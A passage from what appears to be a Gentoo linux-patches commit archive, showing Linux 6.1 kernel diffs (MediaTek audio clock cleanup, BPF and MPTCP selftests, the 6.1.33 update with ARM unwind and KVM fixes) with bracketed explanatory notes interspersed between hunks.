+ 		mt8195_afe_runtime_suspend(&pdev->dev);
+-
+-	mt8195_afe_deinit_clock(afe);
+-	return 0;
+ }
+ 
+ static const struct of_device_id mt8195_afe_pcm_dt_match[] = {
+@@ -3285,7 +3280,7 @@ static struct platform_driver mt8195_afe_pcm_driver = {
+ 		   .pm = &mt8195_afe_pm_ops,
+ 	},
+ 	.probe = mt8195_afe_pcm_dev_probe,
+-	.remove = mt8195_afe_pcm_dev_remove,
++	.remove_new = mt8195_afe_pcm_dev_remove,
+ };
+ 
+ module_platform_driver(mt8195_afe_pcm_driver);
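
[Editorial note, not part of the patch above.] For context on the .remove_new conversion: platform-bus remove callbacks historically returned int, but the bus only warns on a non-zero value and carries on, so the return code never did anything useful. .remove_new is the transitional void-returning callback for drivers whose teardown cannot fail, which is the case here once the clock cleanup is device-managed (see the audsys hunk below). A hedged sketch with hypothetical names:

	static void my_afe_remove(struct platform_device *pdev)
	{
		/* unwind only what probe set up; nothing here can fail */
		snd_soc_unregister_component(&pdev->dev);
		pm_runtime_disable(&pdev->dev);
	}

	static struct platform_driver my_afe_driver = {
		.driver		= { .name = "my-afe" },
		.probe		= my_afe_probe,
		.remove_new	= my_afe_remove,	/* void, not int */
	};
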
+diff --git a/sound/soc/mediatek/mt8195/mt8195-audsys-clk.c b/sound/soc/mediatek/mt8195/mt8195-audsys-clk.c
+index e0670e0dbd5b0..38594bc3f2f77 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-audsys-clk.c
++++ b/sound/soc/mediatek/mt8195/mt8195-audsys-clk.c
+@@ -148,6 +148,29 @@ static const struct afe_gate aud_clks[CLK_AUD_NR_CLK] = {
+ 	GATE_AUD6(CLK_AUD_GASRC19, "aud_gasrc19", "top_asm_h", 19),
+ };
+ 
++static void mt8195_audsys_clk_unregister(void *data)
++{
++	struct mtk_base_afe *afe = data;
++	struct mt8195_afe_private *afe_priv = afe->platform_priv;
++	struct clk *clk;
++	struct clk_lookup *cl;
++	int i;
++
++	if (!afe_priv)
++		return;
++
++	for (i = 0; i < CLK_AUD_NR_CLK; i++) {
++		cl = afe_priv->lookup[i];
++		if (!cl)
++			continue;
++
++		clk = cl->clk;
++		clk_unregister_gate(clk);
++
++		clkdev_drop(cl);
++	}
++}
++
+ int mt8195_audsys_clk_register(struct mtk_base_afe *afe)
+ {
+ 	struct mt8195_afe_private *afe_priv = afe->platform_priv;
+@@ -188,27 +211,5 @@ int mt8195_audsys_clk_register(struct mtk_base_afe *afe)
+ 		afe_priv->lookup[i] = cl;
+ 	}
+ 
+-	return 0;
+-}
+-
+-void mt8195_audsys_clk_unregister(struct mtk_base_afe *afe)
+-{
+-	struct mt8195_afe_private *afe_priv = afe->platform_priv;
+-	struct clk *clk;
+-	struct clk_lookup *cl;
+-	int i;
+-
+-	if (!afe_priv)
+-		return;
+-
+-	for (i = 0; i < CLK_AUD_NR_CLK; i++) {
+-		cl = afe_priv->lookup[i];
+-		if (!cl)
+-			continue;
+-
+-		clk = cl->clk;
+-		clk_unregister_gate(clk);
+-
+-		clkdev_drop(cl);
+-	}
++	return devm_add_action_or_reset(afe->dev, mt8195_audsys_clk_unregister, afe);
+ }
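
[Editorial note, not part of the patch above.] The audsys change replaces an exported unregister function with a device-managed cleanup action: devm_add_action_or_reset() queues the callback to run automatically when the device is unbound, and if queueing itself fails it runs the callback immediately and returns the error, so neither the probe error path nor remove() needs a manual unwind call anymore. A minimal sketch of the idiom, with hypothetical acquire/release helpers:

	static void my_cleanup(void *data)
	{
		struct my_priv *priv = data;

		release_my_resource(priv);	/* hypothetical teardown */
	}

	static int my_setup(struct device *dev, struct my_priv *priv)
	{
		int ret;

		ret = acquire_my_resource(priv);	/* hypothetical setup */
		if (ret)
			return ret;

		/*
		 * my_cleanup(priv) now runs automatically on unbind; if
		 * this registration fails, it runs right away and the
		 * error is returned, so no separate unwind is needed.
		 */
		return devm_add_action_or_reset(dev, my_cleanup, priv);
	}
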
+diff --git a/sound/soc/mediatek/mt8195/mt8195-audsys-clk.h b/sound/soc/mediatek/mt8195/mt8195-audsys-clk.h
+index 239d31016ba76..69db2dd1c9e02 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-audsys-clk.h
++++ b/sound/soc/mediatek/mt8195/mt8195-audsys-clk.h
+@@ -10,6 +10,5 @@
+ #define _MT8195_AUDSYS_CLK_H_
+ 
+ int mt8195_audsys_clk_register(struct mtk_base_afe *afe);
+-void mt8195_audsys_clk_unregister(struct mtk_base_afe *afe);
+ 
+ #endif
+diff --git a/tools/testing/selftests/bpf/prog_tests/sockopt_sk.c b/tools/testing/selftests/bpf/prog_tests/sockopt_sk.c
+index 60d952719d275..05d0e07da3942 100644
+--- a/tools/testing/selftests/bpf/prog_tests/sockopt_sk.c
++++ b/tools/testing/selftests/bpf/prog_tests/sockopt_sk.c
+@@ -3,6 +3,7 @@
+ #include "cgroup_helpers.h"
+ 
+ #include <linux/tcp.h>
++#include <linux/netlink.h>
+ #include "sockopt_sk.skel.h"
+ 
+ #ifndef SOL_TCP
+@@ -183,6 +184,33 @@ static int getsetsockopt(void)
+ 		goto err;
+ 	}
+ 
++	/* optval=NULL case is handled correctly */
++
++	close(fd);
++	fd = socket(AF_NETLINK, SOCK_RAW, 0);
++	if (fd < 0) {
++		log_err("Failed to create AF_NETLINK socket");
++		return -1;
++	}
++
++	buf.u32 = 1;
++	optlen = sizeof(__u32);
++	err = setsockopt(fd, SOL_NETLINK, NETLINK_ADD_MEMBERSHIP, &buf, optlen);
++	if (err) {
++		log_err("Unexpected getsockopt(NETLINK_ADD_MEMBERSHIP) err=%d errno=%d",
++			err, errno);
++		goto err;
++	}
++
++	optlen = 0;
++	err = getsockopt(fd, SOL_NETLINK, NETLINK_LIST_MEMBERSHIPS, NULL, &optlen);
++	if (err) {
++		log_err("Unexpected getsockopt(NETLINK_LIST_MEMBERSHIPS) err=%d errno=%d",
++			err, errno);
++		goto err;
++	}
++	ASSERT_EQ(optlen, 8, "Unexpected NETLINK_LIST_MEMBERSHIPS value");
++
+ 	free(big_buf);
+ 	close(fd);
+ 	return 0;
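
[Editorial note, not part of the patch above.] The new test block relies on a size-probe idiom worth spelling out: for NETLINK_LIST_MEMBERSHIPS, getsockopt() accepts a NULL optval with optlen 0, succeeds, and writes the number of bytes the membership bitmap needs back through optlen (the test above expects 8). A small userspace sketch of probe-then-allocate, with error handling elided for brevity:

	#include <stdlib.h>
	#include <sys/socket.h>
	#include <linux/netlink.h>

	static void *get_netlink_groups(int fd, socklen_t *len)
	{
		socklen_t optlen = 0;
		void *groups;

		/* NULL optval + zero optlen: kernel only reports the size */
		getsockopt(fd, SOL_NETLINK, NETLINK_LIST_MEMBERSHIPS,
			   NULL, &optlen);
		groups = malloc(optlen);
		getsockopt(fd, SOL_NETLINK, NETLINK_LIST_MEMBERSHIPS,
			   groups, &optlen);
		*len = optlen;
		return groups;		/* caller frees */
	}

The companion BPF change in the next hunk makes the cgroup sockopt hook pass AF_NETLINK sockets through untouched, so this NULL-optval case reaches the kernel's native handler instead of faulting.
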
+diff --git a/tools/testing/selftests/bpf/progs/sockopt_sk.c b/tools/testing/selftests/bpf/progs/sockopt_sk.c
+index c8d810010a946..fe1df4cd206eb 100644
+--- a/tools/testing/selftests/bpf/progs/sockopt_sk.c
++++ b/tools/testing/selftests/bpf/progs/sockopt_sk.c
+@@ -32,6 +32,12 @@ int _getsockopt(struct bpf_sockopt *ctx)
+ 	__u8 *optval_end = ctx->optval_end;
+ 	__u8 *optval = ctx->optval;
+ 	struct sockopt_sk *storage;
++	struct bpf_sock *sk;
++
++	/* Bypass AF_NETLINK. */
++	sk = ctx->sk;
++	if (sk && sk->family == AF_NETLINK)
++		return 1;
+ 
+ 	/* Make sure bpf_get_netns_cookie is callable.
+ 	 */
+@@ -131,6 +137,12 @@ int _setsockopt(struct bpf_sockopt *ctx)
+ 	__u8 *optval_end = ctx->optval_end;
+ 	__u8 *optval = ctx->optval;
+ 	struct sockopt_sk *storage;
++	struct bpf_sock *sk;
++
++	/* Bypass AF_NETLINK. */
++	sk = ctx->sk;
++	if (sk && sk->family == AF_NETLINK)
++		return 1;
+ 
+ 	/* Make sure bpf_get_netns_cookie is callable.
+ 	 */
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index c7da2bd7c3286..6be19b1038243 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -851,7 +851,15 @@ do_transfer()
+ 				tk=$(sed -n 's/.*\(token:\)\([[:digit:]]*\).*$/\2/p;q' "$evts_ns1")
+ 				ip netns exec ${listener_ns} ./pm_nl_ctl ann $addr token $tk id $id
+ 				sleep 1
++				sp=$(grep "type:10" "$evts_ns1" |
++				     sed -n 's/.*\(sport:\)\([[:digit:]]*\).*$/\2/p;q')
++				da=$(grep "type:10" "$evts_ns1" |
++				     sed -n 's/.*\(daddr6:\)\([0-9a-f:.]*\).*$/\2/p;q')
++				dp=$(grep "type:10" "$evts_ns1" |
++				     sed -n 's/.*\(dport:\)\([[:digit:]]*\).*$/\2/p;q')
+ 				ip netns exec ${listener_ns} ./pm_nl_ctl rem token $tk id $id
++				ip netns exec ${listener_ns} ./pm_nl_ctl dsf lip "::ffff:$addr" \
++							lport $sp rip $da rport $dp token $tk
+ 			fi
+ 
+ 			counter=$((counter + 1))
+@@ -917,6 +925,7 @@ do_transfer()
+ 				sleep 1
+ 				sp=$(grep "type:10" "$evts_ns2" |
+ 				     sed -n 's/.*\(sport:\)\([[:digit:]]*\).*$/\2/p;q')
++				ip netns exec ${connector_ns} ./pm_nl_ctl rem token $tk id $id
+ 				ip netns exec ${connector_ns} ./pm_nl_ctl dsf lip $addr lport $sp \
+ 									rip $da rport $dp token $tk
+ 			fi
+@@ -2999,7 +3008,7 @@ userspace_tests()
+ 		pm_nl_set_limits $ns1 0 1
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 userspace_1 slow
+ 		chk_join_nr 1 1 1
+-		chk_rm_nr 0 1
++		chk_rm_nr 1 1
+ 	fi
+ }
+ 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-09 12:02 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-09 12:02 UTC (permalink / raw
  To: gentoo-commits

commit:     3c90be0a17c6a8daaa7786f407058de578bb1dec
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jun  9 12:01:57 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jun  9 12:01:57 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3c90be0a

Remove redundant patch

Removed:
2100_io-uring-undeprecate-epoll-ctl-support.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                       |  4 ----
 2100_io-uring-undeprecate-epoll-ctl-support.patch | 21 ---------------------
 2 files changed, 25 deletions(-)

diff --git a/0000_README b/0000_README
index 20dddfc3..5b332006 100644
--- a/0000_README
+++ b/0000_README
@@ -187,10 +187,6 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
-Patch:  2100_io-uring-undeprecate-epoll-ctl-support.patch
-From:   https://patchwork.kernel.org/project/io-uring/patch/20230506095502.13401-1-info@bnoordhuis.nl/
-Desc:   io_uring: undeprecate epoll_ctl support
-
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requires REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2100_io-uring-undeprecate-epoll-ctl-support.patch b/2100_io-uring-undeprecate-epoll-ctl-support.patch
deleted file mode 100644
index 4c3d3904..00000000
--- a/2100_io-uring-undeprecate-epoll-ctl-support.patch
+++ /dev/null
@@ -1,21 +0,0 @@
-io_uring: undeprecate epoll_ctl support
-
----
- io_uring/epoll.c | 4 ----
- 1 file changed, 4 deletions(-)
-
-diff --git a/io_uring/epoll.c b/io_uring/epoll.c
-index 9aa74d2c80bc..89bff2068a19 100644
---- a/io_uring/epoll.c
-+++ b/io_uring/epoll.c
-@@ -25,10 +25,6 @@ int io_epoll_ctl_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
- {
- 	struct io_epoll *epoll = io_kiocb_to_cmd(req, struct io_epoll);
- 
--	pr_warn_once("%s: epoll_ctl support in io_uring is deprecated and will "
--		     "be removed in a future Linux kernel version.\n",
--		     current->comm);
--
- 	if (sqe->buf_index || sqe->splice_fd_in)
- 		return -EINVAL;
- 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-09 11:29 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-09 11:29 UTC (permalink / raw
  To: gentoo-commits

commit:     6a7b67ec1b322cd6ddceee5435358f5f257e15a0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jun  9 11:29:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jun  9 11:29:39 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6a7b67ec

Linux patch 6.1.33

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1032_linux-6.1.33.patch | 7979 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7983 insertions(+)

diff --git a/0000_README b/0000_README
index a242f865..20dddfc3 100644
--- a/0000_README
+++ b/0000_README
@@ -167,6 +167,10 @@ Patch:  1031_linux-6.1.32.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.32
 
+Patch:  1032_linux-6.1.33.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.33
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1032_linux-6.1.33.patch b/1032_linux-6.1.33.patch
new file mode 100644
index 00000000..d6b27484
--- /dev/null
+++ b/1032_linux-6.1.33.patch
@@ -0,0 +1,7979 @@
+diff --git a/Documentation/devicetree/bindings/iio/adc/renesas,rcar-gyroadc.yaml b/Documentation/devicetree/bindings/iio/adc/renesas,rcar-gyroadc.yaml
+index c115e2e99bd9a..4a7b1385fdc7e 100644
+--- a/Documentation/devicetree/bindings/iio/adc/renesas,rcar-gyroadc.yaml
++++ b/Documentation/devicetree/bindings/iio/adc/renesas,rcar-gyroadc.yaml
+@@ -86,7 +86,7 @@ patternProperties:
+             of the MAX chips to the GyroADC, while MISO line of each Maxim
+             ADC connects to a shared input pin of the GyroADC.
+         enum:
+-          - adi,7476
++          - adi,ad7476
+           - fujitsu,mb88101a
+           - maxim,max1162
+           - maxim,max11100
+diff --git a/Documentation/devicetree/bindings/sound/tas2562.yaml b/Documentation/devicetree/bindings/sound/tas2562.yaml
+index 30f6b029ac085..cb519a4b6e710 100644
+--- a/Documentation/devicetree/bindings/sound/tas2562.yaml
++++ b/Documentation/devicetree/bindings/sound/tas2562.yaml
+@@ -52,7 +52,9 @@ properties:
+     description: TDM TX current sense time slot.
+ 
+   '#sound-dai-cells':
+-    const: 1
++    # The codec has a single DAI, the #sound-dai-cells=<1>; case is left in for backward
++    # compatibility but is deprecated.
++    enum: [0, 1]
+ 
+ required:
+   - compatible
+@@ -69,7 +71,7 @@ examples:
+      codec: codec@4c {
+        compatible = "ti,tas2562";
+        reg = <0x4c>;
+-       #sound-dai-cells = <1>;
++       #sound-dai-cells = <0>;
+        interrupt-parent = <&gpio1>;
+        interrupts = <14>;
+        shutdown-gpios = <&gpio1 15 0>;
+diff --git a/Documentation/devicetree/bindings/sound/tas2770.yaml b/Documentation/devicetree/bindings/sound/tas2770.yaml
+index bc90e72bf7cf9..1859fbe1cdf17 100644
+--- a/Documentation/devicetree/bindings/sound/tas2770.yaml
++++ b/Documentation/devicetree/bindings/sound/tas2770.yaml
+@@ -54,7 +54,9 @@ properties:
+       - 1 # Falling edge
+ 
+   '#sound-dai-cells':
+-    const: 1
++    # The codec has a single DAI, the #sound-dai-cells=<1>; case is left in for backward
++    # compatibility but is deprecated.
++    enum: [0, 1]
+ 
+ required:
+   - compatible
+@@ -71,7 +73,7 @@ examples:
+      codec: codec@41 {
+        compatible = "ti,tas2770";
+        reg = <0x41>;
+-       #sound-dai-cells = <1>;
++       #sound-dai-cells = <0>;
+        interrupt-parent = <&gpio1>;
+        interrupts = <14>;
+        reset-gpio = <&gpio1 15 0>;
+diff --git a/Documentation/devicetree/bindings/sound/tas27xx.yaml b/Documentation/devicetree/bindings/sound/tas27xx.yaml
+index 66a0df8850ea6..079cb6f8d4474 100644
+--- a/Documentation/devicetree/bindings/sound/tas27xx.yaml
++++ b/Documentation/devicetree/bindings/sound/tas27xx.yaml
+@@ -47,7 +47,9 @@ properties:
+     description: TDM TX voltage sense time slot.
+ 
+   '#sound-dai-cells':
+-    const: 1
++    # The codec has a single DAI, the #sound-dai-cells=<1>; case is left in for backward
++    # compatibility but is deprecated.
++    enum: [0, 1]
+ 
+ required:
+   - compatible
+@@ -64,7 +66,7 @@ examples:
+      codec: codec@38 {
+        compatible = "ti,tas2764";
+        reg = <0x38>;
+-       #sound-dai-cells = <1>;
++       #sound-dai-cells = <0>;
+        interrupt-parent = <&gpio1>;
+        interrupts = <14>;
+        reset-gpios = <&gpio1 15 0>;
+diff --git a/Documentation/devicetree/bindings/usb/snps,dwc3.yaml b/Documentation/devicetree/bindings/usb/snps,dwc3.yaml
+index 6d78048c4613e..045fc7a28c45f 100644
+--- a/Documentation/devicetree/bindings/usb/snps,dwc3.yaml
++++ b/Documentation/devicetree/bindings/usb/snps,dwc3.yaml
+@@ -260,7 +260,7 @@ properties:
+     description:
+       High-Speed PHY interface selection between UTMI+ and ULPI when the
+       DWC_USB3_HSPHY_INTERFACE has value 3.
+-    $ref: /schemas/types.yaml#/definitions/uint8
++    $ref: /schemas/types.yaml#/definitions/string
+     enum: [utmi, ulpi]
+ 
+   snps,quirk-frame-length-adjustment:
+diff --git a/Makefile b/Makefile
+index a0c3d8809e93a..6be79c5c934f5 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 32
++SUBLEVEL = 33
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/stm32f7-pinctrl.dtsi b/arch/arm/boot/dts/stm32f7-pinctrl.dtsi
+index 8f37aefa73150..000278ec2c58f 100644
+--- a/arch/arm/boot/dts/stm32f7-pinctrl.dtsi
++++ b/arch/arm/boot/dts/stm32f7-pinctrl.dtsi
+@@ -284,6 +284,88 @@
+ 					slew-rate = <2>;
+ 				};
+ 			};
++
++			can1_pins_a: can1-0 {
++				pins1 {
++					pinmux = <STM32_PINMUX('A', 12, AF9)>; /* CAN1_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('A', 11, AF9)>; /* CAN1_RX */
++					bias-pull-up;
++				};
++			};
++
++			can1_pins_b: can1-1 {
++				pins1 {
++					pinmux = <STM32_PINMUX('B', 9, AF9)>; /* CAN1_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('B', 8, AF9)>; /* CAN1_RX */
++					bias-pull-up;
++				};
++			};
++
++			can1_pins_c: can1-2 {
++				pins1 {
++					pinmux = <STM32_PINMUX('D', 1, AF9)>; /* CAN1_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('D', 0, AF9)>; /* CAN1_RX */
++					bias-pull-up;
++
++				};
++			};
++
++			can1_pins_d: can1-3 {
++				pins1 {
++					pinmux = <STM32_PINMUX('H', 13, AF9)>; /* CAN1_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('H', 14, AF9)>; /* CAN1_RX */
++					bias-pull-up;
++
++				};
++			};
++
++			can2_pins_a: can2-0 {
++				pins1 {
++					pinmux = <STM32_PINMUX('B', 6, AF9)>; /* CAN2_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('B', 5, AF9)>; /* CAN2_RX */
++					bias-pull-up;
++				};
++			};
++
++			can2_pins_b: can2-1 {
++				pins1 {
++					pinmux = <STM32_PINMUX('B', 13, AF9)>; /* CAN2_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('B', 12, AF9)>; /* CAN2_RX */
++					bias-pull-up;
++				};
++			};
++
++			can3_pins_a: can3-0 {
++				pins1 {
++					pinmux = <STM32_PINMUX('A', 15, AF11)>; /* CAN3_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('A', 8, AF11)>; /* CAN3_RX */
++					bias-pull-up;
++				};
++			};
++
++			can3_pins_b: can3-1 {
++				pins1 {
++					pinmux = <STM32_PINMUX('B', 4, AF11)>;  /* CAN3_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('B', 3, AF11)>; /* CAN3_RX */
++					bias-pull-up;
++				};
++			};
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/kernel/unwind.c b/arch/arm/kernel/unwind.c
+index a37ea6c772cd5..2e6aa5dc15bf3 100644
+--- a/arch/arm/kernel/unwind.c
++++ b/arch/arm/kernel/unwind.c
+@@ -307,6 +307,29 @@ static int unwind_exec_pop_subset_r0_to_r3(struct unwind_ctrl_block *ctrl,
+ 	return URC_OK;
+ }
+ 
++static unsigned long unwind_decode_uleb128(struct unwind_ctrl_block *ctrl)
++{
++	unsigned long bytes = 0;
++	unsigned long insn;
++	unsigned long result = 0;
++
++	/*
++	 * unwind_get_byte() will advance `ctrl` one instruction at a time, so
++	 * loop until we get an instruction byte where bit 7 is not set.
++	 *
++	 * Note: This decodes a maximum of 4 bytes to output 28 bits data where
++	 * max is 0xfffffff: that will cover a vsp increment of 1073742336, hence
++	 * it is sufficient for unwinding the stack.
++	 */
++	do {
++		insn = unwind_get_byte(ctrl);
++		result |= (insn & 0x7f) << (bytes * 7);
++		bytes++;
++	} while (!!(insn & 0x80) && (bytes != sizeof(result)));
++
++	return result;
++}
++
+ /*
+  * Execute the current unwind instruction.
+  */
+@@ -360,7 +383,7 @@ static int unwind_exec_insn(struct unwind_ctrl_block *ctrl)
+ 		if (ret)
+ 			goto error;
+ 	} else if (insn == 0xb2) {
+-		unsigned long uleb128 = unwind_get_byte(ctrl);
++		unsigned long uleb128 = unwind_decode_uleb128(ctrl);
+ 
+ 		ctrl->vrs[SP] += 0x204 + (uleb128 << 2);
+ 	} else {
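
[Editorial note, not part of the patch above.] A worked decode may help here, since the old code read only one byte and silently mis-parsed longer encodings. ULEB128 stores 7 payload bits per byte, least significant group first, with bit 7 as a continuation flag. Tracing the new loop on the (hypothetical) byte sequence 0x85 0x02:

	/* Illustration only:
	 *   byte 0: 0x85 -> (0x85 & 0x7f) << 0 = 5,   bit 7 set, continue
	 *   byte 1: 0x02 -> (0x02 & 0x7f) << 7 = 256, bit 7 clear, stop
	 *   result = 261, so opcode 0xb2 advances vsp by
	 *   0x204 + (261 << 2) = 516 + 1044 = 1560 bytes.
	 * The old single unwind_get_byte() call would have taken 0x85
	 * (= 133) as the whole operand and then misread the trailing
	 * 0x02 byte as the next unwind opcode, desynchronizing the
	 * instruction stream.
	 */
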
+diff --git a/arch/arm64/kernel/vdso.c b/arch/arm64/kernel/vdso.c
+index 99ae81ab91a74..6ebb8dea5f09e 100644
+--- a/arch/arm64/kernel/vdso.c
++++ b/arch/arm64/kernel/vdso.c
+@@ -312,7 +312,7 @@ static int aarch32_alloc_kuser_vdso_page(void)
+ 
+ 	memcpy((void *)(vdso_page + 0x1000 - kuser_sz), __kuser_helper_start,
+ 	       kuser_sz);
+-	aarch32_vectors_page = virt_to_page(vdso_page);
++	aarch32_vectors_page = virt_to_page((void *)vdso_page);
+ 	return 0;
+ }
+ 
+diff --git a/arch/arm64/kvm/hyp/include/hyp/switch.h b/arch/arm64/kvm/hyp/include/hyp/switch.h
+index 3330d1b76bdd2..2208d79b18dea 100644
+--- a/arch/arm64/kvm/hyp/include/hyp/switch.h
++++ b/arch/arm64/kvm/hyp/include/hyp/switch.h
+@@ -351,17 +351,21 @@ static bool kvm_hyp_handle_cp15_32(struct kvm_vcpu *vcpu, u64 *exit_code)
+ 	return false;
+ }
+ 
+-static bool kvm_hyp_handle_iabt_low(struct kvm_vcpu *vcpu, u64 *exit_code)
++static bool kvm_hyp_handle_memory_fault(struct kvm_vcpu *vcpu, u64 *exit_code)
+ {
+ 	if (!__populate_fault_info(vcpu))
+ 		return true;
+ 
+ 	return false;
+ }
++static bool kvm_hyp_handle_iabt_low(struct kvm_vcpu *vcpu, u64 *exit_code)
++	__alias(kvm_hyp_handle_memory_fault);
++static bool kvm_hyp_handle_watchpt_low(struct kvm_vcpu *vcpu, u64 *exit_code)
++	__alias(kvm_hyp_handle_memory_fault);
+ 
+ static bool kvm_hyp_handle_dabt_low(struct kvm_vcpu *vcpu, u64 *exit_code)
+ {
+-	if (!__populate_fault_info(vcpu))
++	if (kvm_hyp_handle_memory_fault(vcpu, exit_code))
+ 		return true;
+ 
+ 	if (static_branch_unlikely(&vgic_v2_cpuif_trap)) {
+diff --git a/arch/arm64/kvm/hyp/nvhe/switch.c b/arch/arm64/kvm/hyp/nvhe/switch.c
+index c2cb46ca4fb66..895fb32000762 100644
+--- a/arch/arm64/kvm/hyp/nvhe/switch.c
++++ b/arch/arm64/kvm/hyp/nvhe/switch.c
+@@ -186,6 +186,7 @@ static const exit_handler_fn hyp_exit_handlers[] = {
+ 	[ESR_ELx_EC_FP_ASIMD]		= kvm_hyp_handle_fpsimd,
+ 	[ESR_ELx_EC_IABT_LOW]		= kvm_hyp_handle_iabt_low,
+ 	[ESR_ELx_EC_DABT_LOW]		= kvm_hyp_handle_dabt_low,
++	[ESR_ELx_EC_WATCHPT_LOW]	= kvm_hyp_handle_watchpt_low,
+ 	[ESR_ELx_EC_PAC]		= kvm_hyp_handle_ptrauth,
+ };
+ 
+@@ -196,6 +197,7 @@ static const exit_handler_fn pvm_exit_handlers[] = {
+ 	[ESR_ELx_EC_FP_ASIMD]		= kvm_hyp_handle_fpsimd,
+ 	[ESR_ELx_EC_IABT_LOW]		= kvm_hyp_handle_iabt_low,
+ 	[ESR_ELx_EC_DABT_LOW]		= kvm_hyp_handle_dabt_low,
++	[ESR_ELx_EC_WATCHPT_LOW]	= kvm_hyp_handle_watchpt_low,
+ 	[ESR_ELx_EC_PAC]		= kvm_hyp_handle_ptrauth,
+ };
+ 
+diff --git a/arch/arm64/kvm/hyp/vhe/switch.c b/arch/arm64/kvm/hyp/vhe/switch.c
+index 1a97391fedd29..45ac4a59cc2ce 100644
+--- a/arch/arm64/kvm/hyp/vhe/switch.c
++++ b/arch/arm64/kvm/hyp/vhe/switch.c
+@@ -110,6 +110,7 @@ static const exit_handler_fn hyp_exit_handlers[] = {
+ 	[ESR_ELx_EC_FP_ASIMD]		= kvm_hyp_handle_fpsimd,
+ 	[ESR_ELx_EC_IABT_LOW]		= kvm_hyp_handle_iabt_low,
+ 	[ESR_ELx_EC_DABT_LOW]		= kvm_hyp_handle_dabt_low,
++	[ESR_ELx_EC_WATCHPT_LOW]	= kvm_hyp_handle_watchpt_low,
+ 	[ESR_ELx_EC_PAC]		= kvm_hyp_handle_ptrauth,
+ };
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index 8c1d2d7128db6..37e74ca4dad85 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -235,9 +235,9 @@ int kvm_vgic_vcpu_init(struct kvm_vcpu *vcpu)
+ 	 * KVM io device for the redistributor that belongs to this VCPU.
+ 	 */
+ 	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3) {
+-		mutex_lock(&vcpu->kvm->arch.config_lock);
++		mutex_lock(&vcpu->kvm->slots_lock);
+ 		ret = vgic_register_redist_iodev(vcpu);
+-		mutex_unlock(&vcpu->kvm->arch.config_lock);
++		mutex_unlock(&vcpu->kvm->slots_lock);
+ 	}
+ 	return ret;
+ }
+@@ -446,11 +446,13 @@ int vgic_lazy_init(struct kvm *kvm)
+ int kvm_vgic_map_resources(struct kvm *kvm)
+ {
+ 	struct vgic_dist *dist = &kvm->arch.vgic;
++	gpa_t dist_base;
+ 	int ret = 0;
+ 
+ 	if (likely(vgic_ready(kvm)))
+ 		return 0;
+ 
++	mutex_lock(&kvm->slots_lock);
+ 	mutex_lock(&kvm->arch.config_lock);
+ 	if (vgic_ready(kvm))
+ 		goto out;
+@@ -463,13 +465,26 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 	else
+ 		ret = vgic_v3_map_resources(kvm);
+ 
+-	if (ret)
++	if (ret) {
+ 		__kvm_vgic_destroy(kvm);
+-	else
+-		dist->ready = true;
++		goto out;
++	}
++	dist->ready = true;
++	dist_base = dist->vgic_dist_base;
++	mutex_unlock(&kvm->arch.config_lock);
++
++	ret = vgic_register_dist_iodev(kvm, dist_base,
++				       kvm_vgic_global_state.type);
++	if (ret) {
++		kvm_err("Unable to register VGIC dist MMIO regions\n");
++		kvm_vgic_destroy(kvm);
++	}
++	mutex_unlock(&kvm->slots_lock);
++	return ret;
+ 
